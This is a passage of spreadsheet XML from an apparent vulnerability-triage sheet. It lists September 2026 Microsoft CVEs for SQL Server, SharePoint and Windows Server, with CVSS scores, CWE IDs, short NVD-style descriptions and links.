      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S46" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K49" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K50" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69461</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69461</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69464</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>Execution with unnecessary privileges in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69464</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69465</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69465</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69518</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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4" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69518</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69551</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K55" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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6" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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0" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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1" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr">
        <is>
